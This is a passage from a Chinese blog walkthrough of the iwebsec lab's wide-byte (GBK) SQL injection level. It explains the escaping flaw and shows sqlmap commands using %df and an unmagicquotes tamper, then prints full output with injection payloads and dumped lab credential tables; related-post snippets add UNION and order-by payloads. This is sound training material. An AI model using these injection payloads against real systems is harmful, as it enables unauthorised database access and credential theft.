iwebsec靶场 SQL注入漏洞通关笔记6- 宽字节注入

已于 2025-04-21 23:07:18 修改
阅读量1.1k 收藏 3
点赞数 2
分类专栏: iwebsec靶场 文章标签: sql sqlmap sql注入 宽字节注入 iwebsec
于 2022-11-27 10:20:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mooyuan/article/details/128035982
版权
本文详细介绍了iwebsec靶场中关于SQL注入漏洞的宽字节注入问题,通过分析源码发现存在报错型注入条件。作者使用sqlmap工具,通过两种注入命令成功渗透,获取了数据库信息。总结中强调了理解原理的重要性,并指出sqlmap在提升效率上的作用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 系列文章目录

iwebsec靶场 SQL注入漏洞通关笔记1- 数字型注入_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记2- 字符型注入(宽字节注入)_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记3- bool注入(布尔型盲注)_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记4- sleep注入(时间型盲注)_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记5- updatexml注入(报错型盲注)_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记6- 宽字节注入_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记7- 空格过滤绕过_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记8- 大小写过滤注入_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记9- 双写关键字绕过_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记10- 双重url编码绕过_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记11-16进制编码绕过_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记12-等价函数替换绕过_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记13-二次注入_iwebsec二次注入-CSDN博客

目录

系列文章目录

一、前言

1. 宽字节基本概念

2. 宽字节注入原理

二、源码分析

三、sqlmap注入

1.注入命令

 2.完整交互过程

总结

一、前言

 打开靶场的SQL注入关卡的第06关,宽字节注入http://192.168.71.151/sqli/06.php?id=1 如下所示

宽字节注入是一种利用数据库或程序对字符编码处理不当而导致的安全漏洞,主要影响使用GBK、GB2312等宽字符编码的系统。

1. 宽字节基本概念

  • 宽字节指占用多个字节的字符编码(如GBK中一个汉字占2字节)

  • 常见宽字符编码:GBK、GB2312、BIG5等(主要针对东亚语言)

2. 宽字节注入原理

当系统使用宽字符集(如GBK)而数据库使用单字节处理时,由于转义字符\(0x5c)可能被"吞并"到宽字符中,导致转义失效。

当对用户输入使用单引号转义时,会在单引号前添加反斜杠(\)进行转义,在 GBK 字符集里,反斜杠占一个字节。攻击者利用 GBK 字符集编码特点,在输入内容中加入特定字符,如%df%df与后面紧跟的单引号(被转义后为\)组合,会形成一个合法的 GBK 双字节字符(如 “縗”),从而导致转义失效。

二、源码分析

如下所示,SQL语句与1-5关的大多数关卡一样,调用的语句为$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";很明显这是一个普通的数字型注入,并且没有对参数id做任何过滤。

不过在输出内容中可以得知仅sql查询成功时输出正确的id,用户名和密码。在错误的时候却执行语句print_r(mysql_error());这个报错语句的使用意味着我们可以利用报错型函数如updatexml,extractvalue等函数进行SQL注入,换言之渗透方法可以参考第05关报错型注入。不过呢,本关卡的源码中如下语句说明其为宽字节型

mysql_query("SET NAMES gbk");

 也就是说本关卡的注入可以使用报错型的宽字节注入

三、sqlmap注入

1.注入命令

方法1:参数id后加上%df

sqlmap -u http://192.168.71.151/sqli/05.php?id=1%df  --current-db --dump --batch

 如下所示,渗透成功

方法2:sqlmap的注入命令语句使用--tamper unmagicquotes

sqlmap -u http://192.168.71.151/sqli/05.php?id=1  --current-db --dump --batch  --tamper unmagicquotes

 2.完整交互过程

完整的注入交互如下所示

kali@kali:~$ sqlmap -u http://192.168.71.151/sqli/05.php?id=1%df  --current-db --dump --batch
        ___
       __H__                                                                                                                                                                                                                               
 ___ ___[.]_____ ___ ___  {1.5.11#stable}                                                                                                                                                                                                  
|_ -| . ["]     | .'| . |                                                                                                                                                                                                                  
|___|_  [)]_|_|_|__,|  _|                                                                                                                                                                                                                  
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                                               

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:36:21 /2022-11-24/

[23:36:21] [INFO] resuming back-end DBMS 'mysql' 
[23:36:21] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (8465=8465) THEN 1 ELSE (SELECT 7769 UNION SELECT 3720) END))

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 1776 FROM(SELECT COUNT(*),CONCAT(0x7171717871,(SELECT (ELT(1776=1776,1))),0x7170707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 2424 FROM (SELECT(SLEEP(5)))vTBV)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7171717871,0x7a756e6165784e50754f725a797052684779706b716f4d504b4e7354596277657354776f4f724468,0x7170707171)-- -
---
[23:36:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[23:36:22] [INFO] fetching current database
current database: 'iwebsec'
[23:36:22] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[23:36:22] [INFO] fetching current database
[23:36:22] [INFO] fetching tables for database: 'iwebsec'
[23:36:22] [INFO] fetching columns for table 'user' in database 'iwebsec'
[23:36:22] [INFO] fetching entries for table 'user' in database 'iwebsec'
Database: iwebsec
Table: user
[3 entries]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1  | pass1    | user1    |
| 2  | pass2    | user2    |
| 3  | pass3    | user3    |
+----+----------+----------+

[23:36:22] [INFO] table 'iwebsec.`user`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/user.csv'
[23:36:22] [INFO] fetching columns for table 'sqli' in database 'iwebsec'
[23:36:22] [INFO] fetching entries for table 'sqli' in database 'iwebsec'
Database: iwebsec
Table: sqli
[7 entries]
+----+-----------------------+----------+------------------------------------------------------+
| id | email                 | password | username                                             |
+----+-----------------------+----------+------------------------------------------------------+
| 1  | user1@iwebsec.com     | pass1    | user1                                                |
| 2  | user2@iwebsec.com     | pass2    | user2                                                |
| 3  | user3@iwebsec.com     | pass3    | user3                                                |
| 4  | user4@iwebsec.com     | admin    | admin                                                |
| 5  | 123@123.com           | 123      | 123                                                  |
| 6  | 1234@123.com          | 123      | ctfs' or updatexml(1,concat(0x7e,(version())),0)#    |
| 7  | iwebsec02@iwebsec.com | 123456   | iwebsec' or updatexml(1,concat(0x7e,(version())),0)# |
+----+-----------------------+----------+------------------------------------------------------+

[23:36:22] [INFO] table 'iwebsec.sqli' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/sqli.csv'
[23:36:22] [INFO] fetching columns for table 'users' in database 'iwebsec'
[23:36:22] [INFO] fetching entries for table 'users' in database 'iwebsec'
Database: iwebsec
Table: users
[1 entry]
+-------+-------------+----------+
| role  | password    | username |
+-------+-------------+----------+
| admin | mall123mall | orange   |
+-------+-------------+----------+

[23:36:22] [INFO] table 'iwebsec.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/users.csv'
[23:36:22] [INFO] fetching columns for table 'xss' in database 'iwebsec'
[23:36:22] [INFO] fetching entries for table 'xss' in database 'iwebsec'
Database: iwebsec
Table: xss
[5 entries]
+----+------------------------------------+
| id | name                               |
+----+------------------------------------+
| 7  | <img src=1 onerror=alert(/ctfs/)/> |
| 6  | <img src=1 onerror=alert(/ctfs/)/> |
| 5  | <img src=1 onerror=alert(/ctfs/)/> |
| 1  | iwebsec                            |
| 8  | <?php phpinfo();?>                 |
+----+------------------------------------+

[23:36:22] [INFO] table 'iwebsec.xss' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/xss.csv'
[23:36:22] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.71.151'
[23:36:22] [WARNING] your sqlmap version is outdated

[*] ending @ 23:36:22 /2022-11-24/

总结

iwebsec靶场的宽字节注入由于使用了报错函数,加上类型为宽字节,而闭合的判断上只是与前几关一样为普通的数字型注入,故而搞清楚原理后,只需要配置正确参数使用sqlmap渗透十分方便高效。初学者还是应该以手动注入方法练习,真正了解原理后可以在使用sqlmap来提升速度。

宽字节注入
东方
06-06 2789
GBK双字节编码:一个汉字用两个字节表示,首字节对应0×81-0xFE,尾字节对应0×40-0xFE(除0×7F),刚好涵盖了转义符号\对应的编码0×5C。 0xD50×5C 对应了汉字“诚”,URL编码用百分号加字符的16进制编码表示字符,于是 %d5%5c 经URL解码后为“诚”。 下面分析攻击过程: 访问 http://www.2cto.com /test.php?username=test...
Webug4.0靶场通关笔记(第三天)--------过滤注入宽字节注入
Yasso的博客
02-21 848
一、过滤注入 这一关为过滤注入,我以为过滤了空格,百度说过滤了select,单独输select会报错。。。。。。。 那这就跟第四关POST注入一样,还是搞吧,POST省略了,这个不能省了。。。。。 1.是否报错 加个单引号会报错 2.既然有报错,先判断列数 可以看出有两列,尝试报错注入 union select 1,database()# -------------但页面没有回显,所以不能用显错注入 再次尝试 and 1=1# 和 and 1=2# -----但无论对错,都没有回显 所
iwebsec靶场SQL注入-宽字节注入
qq_56041380的博客
03-28 699
开发者为了防止出现SQL注入攻击,将用户输入的数据用addslashes等函数进行过滤。addslashes等函数默认对单引号等字符进行转义,这样就可以避免注入宽字节注入产生的原因是MYSQL在使用GBK编码的时候如果第一个字符的ASCII码大于128,会认为前面两个字符是汉字,会将前两个字符拼接为汉字,这样就可以将SQL语句闭合,造成宽字节注入
SQL注入宽字节注入sql注入到getshell,sqlmap注入的使用)和XSS漏洞(存储型)实战练习(DVWA靶场
最新发布
m0_74292210的博客
03-21 613
因为网站会把用户输入的'前面加\进行处理,\会被编码为%5c,但是在查询中把%df和%5c通过GBK编码为汉字。在我们的请求里面,网站已经把我们输入的%编码为了%25,不能达到我们的目的,所以手动修改数据包。发现name做了长度限制,可以通过抓包或者改前端html来绕过。然后发现name做了<script>的替换,然后可以开始绕过。发现方法有效,该点存在宽字节注入漏洞,然后开始正式爆破。所以在'前加一个%df就可以把网站给我们加的\给绕过。过滤,绕不过去,只能从name注入。数据库名为pikachu。
CTF学习笔记8:iwebsec-SQL注入漏洞-06-宽字节注入
lvx++的博客
01-23 1044
直接上payload ?id=-1%df’ union select 1,2,group_concat(concat(username,0x7e,password)) from iwebsec.users–+
iwebsec sql-宽字节注入
Enrich_Life的博客
11-05 74
函数会对引号进行转义但是这里用了 gbk 编码,这里和02-字符注入不同的是可以结合报错注入。原理解析可以回去看02-字符注入。原理解析回去看02-字符注入。跟02-字符注入一样,
sqlmap宽字节注入(一)GET
qq_45300786的博客
07-17 1562
不懂的可以看前面的宽字节注入(一) 先给他写好闭合 %df' -- + 然后抓包 把这个数据包,保存到一个为 321.txt的文件 开始用sqlmap类型 数据库 下面还可以很多参数,我就不一一介绍了。 ...
Sqli-labs全套(1-65)-通关笔记
TyRant的博客
04-10 4694
Basic Challenges 01-Error Based-Single quotes Error Based: 可以通过报错知道闭合方式 > paylod: ?id=1') and ;--+ 源码拼接后: SELECT * FROM users WHERE id=('$id') LIMIT 0,1; SELECT * FROM users WHERE id=('1') and ;-- ') LIMIT 0,1; > err: You have an error in your SQL
sqli-labs闯关笔记
qq_41738909的博客
01-13 526
3.报错了典型的单引号注入,顺着单引号注入开干!3没报错有三列,4报错了证明有最多有3列。7.看到了username,password这俩就是目标了!id=1在后面加上',"判断是个啥注入方式。5.得到了数据库名字'security' 开始爆库。4. 查看一下他有哪些库和数据库版本。6.拿到了库名,开始爆表。1.打开页面观察一下。
DVWA靶场通关(2023)
2301_80548709的博客
02-23 2745
1.这道题是爆破用户名,以及密码,其实就是通过burp软件来爆破抓包成功!接下来爆破修改这两个值,进行爆破,正确导入字典后,开始爆破.因为已经知道了答案,我们可以让爆破的数量少一点,找到数量不一致的,得到结果2.第二种,主要区别在于我们必须休眠两秒,才能继续.所以让它休眠2000ms就欧克了为了方便,我就将正确答案置于了顶端,可以发现,我们的爆破可以保证全为200的状态码3.第三题,通过查询得到,主要增加了token值,这个东西。
OWASP Security Shepherd CTF关键点答案通关指引实战笔记
weixin_56899809的博客
09-17 1202
该文章为安全测试训练平台“OWASP Security Shepherd”的关卡关键点指引答案,全部关卡答案,关卡关键指引点,实战笔记
渗透测试-SQL注入宽字节注入
lza20001103的博客
04-20 9644
渗透测试-SQL注入宽字节注入
SQL注入宽字节注入
m0_38103658的博客
10-24 746
SQL注入宽字节注入 0x01简介 SQL注入近几年来连续被OWASP当作十大漏洞中最最危险的漏洞而存在。无论是从数据库中获得敏感信息还是执行一系列的恶意操作甚至是直接获取整个数据库权限,都可能发生在一次小小的提交参数的过程中。为此大多数网站开始对于SQL注入做了一定的防御方法,最早有人提出,将用户提交的所有敏感字符进行过滤和转义,要么将提交参数中的敏感字符过滤掉后再提交给数据库,要么对那些敏...
宽字节SQL注入
一米八多的瑞兹的博客
02-25 211
宽字节SQL注入 1. 宽字节注入基础 最常使用的宽字节注入是利用%df,其实我们只要第一个ascii码大于128就可以了,比如ascii码为129的就可以,但是我们怎么将他转换为URL编码呢,其实很简单,我们先将129(十进制)转换为十六进制,为0x81,如图1所示,然后在十六进制前面加%即可,即为%81 GBK首字节对应0×81-0xFE,尾字节对应0×40-0xFE(除0×7F) 2. 宽字节注入代码分析 Sqli-Less32 代码分析 mysql_real_escape_string() 和 ad
iwebsec靶场通关sql注入详解
m0_51090949的博客
07-12 1666
iwebsec靶场sql注入通关,详细教程。
iwebsec靶场 XSS漏洞通关笔记
web15185420056的博客
12-12 1023
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。
sqlmap宽字节注入_姿势汇总
qq_62989306的博客
12-09 339
使用靶场pikachu,sql-inject的宽字节注入。这个参数可以指定前缀,宽字节注入设置前缀为。,将*写在宽字节注入和注释符中间。1)这里是post传参,可以利用。参数指定post数据包。
iwebsec靶场SQL注入漏洞-字符型注入
02-24
### 关于iwebsec靶场中字符型SQL注入漏洞分析 在探讨iwebsec靶场中的字符型SQL注入漏洞时,需理解其核心在于利用特定字符串构造来绕过输入验证机制并执行恶意查询。当应用程序未能正确处理特殊字符或未对用户输入做充分过滤时,攻击者可以通过提交精心设计的数据引发数据库错误或获取敏感信息。 对于字符型注入而言,在构建测试用语句时通常会附加单引号 `'` 来闭合原有查询条件,并通过联合选择 `UNION SELECT` 或其他方法尝试读取额外的信息[^5]。例如: ```sql ?id=1' UNION SELECT 1,2,3--+ ``` 此命令试图关闭原始查询并通过追加新的SELECT子句返回自定义的结果集;然而,如果结尾处缺少必要的注释符号(即双连字符 `--`),这可能导致语法不匹配从而引起服务器端异常响应。 为了进一步探索目标系统的结构以及潜在的安全弱点,可以采用如下策略来进行更深入的渗透测试: - **确认注入点**:先确定是否存在可被利用的位置,比如上述提到的ID参数。 - **探测列数**:使用ORDER BY指令调整输出顺序直至找到最大有效索引值,以此推断出内部表格所含有的字段数目。如下面的例子展示了如何检测第四列为上限的情况: ```php /sqli/02.php?id=-1%df%27%20order%20by%204--+ ``` - **提取元数据**:一旦知道了表内有多少个属性,则可通过GROUP_CONCAT()函数一次性抓取多个记录的内容。这里给出了一种方式用于收集用户名和密码组合: ```sql ?id=-1 UNION SELECT 1,2,GROUP_CONCAT(CONCAT_WS(0x7E,username,password)) FROM iwebsec.user-- ``` 值得注意的是,以上操作均基于假设环境下的实验性质活动,并非真实世界里的合法行为。实际开发过程中应当遵循安全编码实践以防止此类风险的发生,同时定期审查现有防护措施的有效性。 #### 宽字节注入技巧 考虑到某些情况下Web应用可能运行在一个特殊的字符集环境中(如GBK),此时还可以运用所谓的“宽字节注入”。这种技术依赖于多字节字符集中存在的特性——部分字符由两个连续字节组成,其中一个可能是反斜杠 `\` ,它作为转义符会影响后续字符解释的方式[^4]。 具体来说就是发送形似 `%DF'` 的请求片段给服务端解析器,后者会在遇到这样的序列之前插入一个反斜杠变成类似于 `%DF\%'` 这样的形式。而在GBK编码下,这个新产生的三字节串正好对应着某个有效的汉字,因此整个表达式不会触发任何报警而是按照预期逻辑继续向下执行下去。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

mooyuan天天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值